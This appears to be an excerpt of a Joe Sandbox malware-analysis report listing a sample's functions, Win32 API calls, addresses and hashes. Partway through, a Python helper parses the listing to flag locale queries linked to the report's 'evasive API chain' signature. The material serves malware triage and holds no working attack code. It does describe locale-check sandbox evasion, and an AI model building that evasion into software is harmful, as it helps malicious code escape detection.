• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorFileLastMove
• String ID:
• API String ID: 55378915-0
• Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
• Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
• Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
• GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
• Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
• Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00452B3F,?,?,00000000), ref: 00452B19
• GetLastError.KERNEL32(00000000,00000000,00452B3F,?,?,00000000), ref: 00452B21
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AttributesErrorFileLast
• String ID:
• API String ID: 1799206407-0
• Opcode ID: d52f41051aeef7c94b755a56baf9b5aca084de999b45dde244c03d315cd33636
• Instruction ID: ab2d8551c2587fa33e08e03b3339d41412f2fea6ae8ede581cb29ed56d474115
• Instruction Fuzzy Hash: DDF0FC71A04708ABCB11EF759D414AEB7E8EB4A32575047B7FC14E3282D7B86E04859C
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadCursorA.USER32(00000000,00007F00), ref: 00423249
• LoadCursorA.USER32(00000000,00000000), ref: 00423273
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CursorLoad
• String ID:
• API String ID: 3238433803-0
• Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
• Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
• Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetVersion.KERNEL32(00000344,0046E17A), ref: 0046E0EE
• 756FE550.OLE32(00499B98,00000000,00000001,00499BA8,?,00000344,0046E17A), ref: 0046E10A
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: E550Version
• String ID:
• API String ID: 1323609852-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
• 757283B0.OLE32(?,0047C8DE), ref: 0047C8D1
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: 757283FolderKnownPath
• String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
• API String ID: 733073498-544719455
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
• GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
  • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Global$Alloc
• String ID:
• API String ID: 2558781224-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
                                                                                                                                                                                                                                  • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                                                                                                                                                  • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
  • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
  • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
• Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
• Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
• Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
• Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
Uniqueness
Uniqueness Score: -1.00%
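The function above reaches GetSystemDefaultLCID directly and GetLocaleInfoA through a subcall, which is the kind of API chain behind the report's "Found evasive API chain (may stop execution after checking locale)" signature. The following is an added triage helper, not code from the report or from Joe Sandbox: it parses "APIs" bullets in the exact shape printed here and flags functions that query the machine locale. The list of locale APIs and the candidate rule are my assumptions; the two sample inputs are the bullets of this entry and of the SHPathPrepareForWriteA entry further down, copied as constructed test data.

```python
import re
from dataclasses import dataclass
from typing import Optional

# One "APIs" bullet from a Joe Sandbox IDA-plugin function entry, in the
# shapes that occur in this report:
#   • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
#   • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,?), ref: 00406E09
#   • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Win32 APIs that reveal the locale/UI language of the host. A sample that exits
# after querying them is the pattern the report's evasion signature describes.
# Which APIs to include is an assumption of this example.
LOCALE_APIS = frozenset({
    "GetSystemDefaultLCID", "GetUserDefaultLCID",
    "GetSystemDefaultLangID", "GetUserDefaultLangID",
    "GetUserDefaultUILanguage", "GetSystemDefaultUILanguage",
    "GetLocaleInfoA", "GetLocaleInfoW", "GetKeyboardLayoutList",
})


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee address when listed as "Part of subcall function"


def parse_apis(block: str) -> list:
    """Parse the bullets of one 'APIs' section; lines that do not match are skipped."""
    calls = []
    for line in block.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["module"].upper(), args, int(m["ref"], 16), sub))
    return calls


def locale_check_candidates(calls: list) -> dict:
    """Report which locale APIs the function reaches, directly or via a subcall."""
    direct = sorted({c.api for c in calls if c.subcall is None and c.api in LOCALE_APIS})
    via_sub = sorted({c.api for c in calls if c.subcall is not None and c.api in LOCALE_APIS})
    return {"direct": direct, "via_subcall": via_sub, "candidate": bool(direct or via_sub)}


# Constructed sample input: the "APIs" bullets of two entries copied from this report.
LOCALE_FUNC = """\
• GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
  • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
  • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
"""
WINDOW_FUNC = """\
  • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
  • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
• SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
"""

if __name__ == "__main__":
    for label, text in (("locale entry", LOCALE_FUNC), ("window entry", WINDOW_FUNC)):
        print(label, locale_check_candidates(parse_apis(text)))
```

Treat a hit as a triage pointer, not a verdict: GetLocaleInfoA next to LoadStringA is also what ordinary localized installer code looks like, and the report itself only says the chain "may" stop execution. The useful next step is to read the code at the listed ref addresses and see whether the LCID result feeds a comparison followed by an exit path.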

APIs
• SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: InfoScroll
• String ID:
• API String ID: 629608716-0
• Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
• Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
• Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
• Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
  • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
• SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
  • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
  • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
• String ID:
• API String ID: 3319771486-0
• Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
• Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
• Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
• Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
• Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
• Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
• Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                  • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                                                                                                                                                  • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1863332320-0
